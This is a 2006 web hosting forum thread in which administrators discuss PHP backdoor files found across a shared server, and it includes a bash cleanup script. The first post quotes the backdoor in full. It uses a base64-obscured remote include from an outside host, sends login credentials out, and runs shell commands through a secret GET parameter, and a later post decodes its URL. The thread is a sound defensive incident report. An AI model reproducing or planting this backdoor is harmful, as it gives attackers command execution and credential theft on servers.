hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : New Vulnerabilities - Scary PHP Files ALL Over the Server
Reply

Forum Jump

New Vulnerabilities - Scary PHP Files ALL Over the Server

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 02-08-2006, 11:05 PM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13

New Vulnerabilities - Scary PHP Files ALL Over the Server


Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here's some examples:

options.php
layout.php
configs.php
base.php
time.php
date.php
tests.php
fsav.php

There's plenty more out there. These files all contain some dirty code...here's an example:

Code:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_en
code($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
Not sure exactly what this does, but...

These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

It seems that the last two weeks has seen a HUGE jump in vulnerabilities...

Anyone else seeing this? Any ideas? Please?



Sponsored Links
  #2  
Old 02-08-2006, 11:34 PM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.

  #3  
Old 02-09-2006, 12:18 AM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Here, I wrote this to try to these files quickly...

The only thing they don't account for are directories with spaces in the name...

Code:
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done
Don't forget to do the updatedb first...and you must run this as root.

If there's a better solution, great...this is the quickest I could come up with.

Sponsored Links
  #4  
Old 02-09-2006, 12:38 AM
Doctorbob Doctorbob is offline
Disabled
 
Join Date: Dec 2005
Posts: 105
Looks like a gallery exploit. Upgrade your galleries to the latest secure versions. Check out secunia.com for known vulnerabilities. Btw, you may try something like this to find exactly what it does.
<?php
print (base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")
?>

  #5  
Old 02-09-2006, 12:43 AM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Yeah, I tried that, got back that it was contacting:

http://bis.iframe.ru/master.php?r_addr=

Unfortunately, a file_get_contents against it doesn't work. I think the server is down (or overloaded from success of the hack?)

  #6  
Old 02-09-2006, 08:57 AM
ScottJ ScottJ is offline
Web Hosting Master
 
Join Date: Feb 2005
Posts: 1,356
Are you using mod_security?

__________________
Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  #7  
Old 02-09-2006, 09:03 AM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Yes, I have mod_security loaded with every option I could find on the net except the IP blacklists (too much performance loss)

  #8  
Old 02-09-2006, 02:50 PM
SteveK42 SteveK42 is offline
Newbie
 
Join Date: Aug 2004
Location: Virginia Beach, VA
Posts: 13
Oops! Problem in the code...here's a working version.

Code:
updatedb
for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
  do
    list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
    for i in $list;
      do     
         thecount=`grep base64_encode $i | wc -l`
         if [ $thecount -ne 0 ]; then
           mv $i $i.hackers
         fi
     done
  done

Reply

Related posts from TheWhir.com
Title Type Date Posted
OpenSSL Users Should Upgrade Now to Fix Heartbleed Security Bug Web Hosting News 2014-04-09 08:20:55
Washington Responds to Cybersecurity Threats with Recommendations and Legislation Web Hosting News 2014-02-07 13:22:48
BitTorrent Sync Announces Platform Updates, 1M+ Users Web Hosting News 2013-11-06 13:36:26
Parallels Plesk Panel Vulnerability Revealed by Hacker Selling Exploit Web Hosting News 2012-07-11 10:34:13
Cloud City Hosting Integrates Backup with Cloud Hosting Plans Web Hosting News 2012-05-11 16:21:19


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?